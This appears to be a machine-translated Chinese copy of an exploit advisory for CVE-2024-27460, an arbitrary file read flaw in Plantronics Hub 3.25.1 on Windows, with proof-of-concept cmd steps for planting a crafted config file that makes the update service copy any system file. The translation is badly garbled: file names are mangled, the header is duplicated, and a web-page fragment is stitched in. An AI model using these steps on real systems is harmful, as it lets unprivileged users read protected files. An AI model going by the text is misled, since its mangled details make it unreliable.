#利用标题: Plantronics Hub 3.25.1 - 任意文件阅读
#日期: 2024-05-10
#利用作者: Farid Zerrouk来自Belgium,Alaa Kachouh的Deloitte Zerrouk
万事达
#供应商HomePage:
#版本: Windows版本3.25.1的Plantronics Hub
#测试在: Windows 10/11
#CVE : CVE-2024-27460
作为常规用户,将一个称为“ martarupgrade.config”的文件丢弃
'c: \ programData \ plantronics \ spokes3g'目录。内容的内容
martarupgrade.config应该看起来像以下liner:
^|^|全路径对您的态度file^| marterupgrade.config
交换全途径到您迎接的文件,并带有所需的文件以读取/复制
(系统上的任何文件)。所需的文件将复制到C: \ program中
文件(x86)\ plantronics \ spokes3g \ updateserviceTemp
复制步骤(POC):
#日期: 2024-05-10
#利用作者: Farid Zerrouk来自Belgium,Alaa Kachouh的Deloitte Zerrouk
万事达
#供应商HomePage:
正在加载...
support.hp.com
#测试在: Windows 10/11
#CVE : CVE-2024-27460
作为常规用户,将一个称为“ martarupgrade.config”的文件丢弃
'c: \ programData \ plantronics \ spokes3g'目录。内容的内容
martarupgrade.config应该看起来像以下liner:
^|^|全路径对您的态度file^| marterupgrade.config
交换全途径到您迎接的文件,并带有所需的文件以读取/复制
(系统上的任何文件)。所需的文件将复制到C: \ program中
文件(x86)\ plantronics \ spokes3g \ updateserviceTemp
复制步骤(POC):
- 打开cmd.exe
- 使用CD C: \ ProgramData \ Plantronics \ Spokes3G导航
- echo^|^|全路径对您的态度- 文件^| marterupgrade.config
- 所需的文件将复制到C: \ Program文件中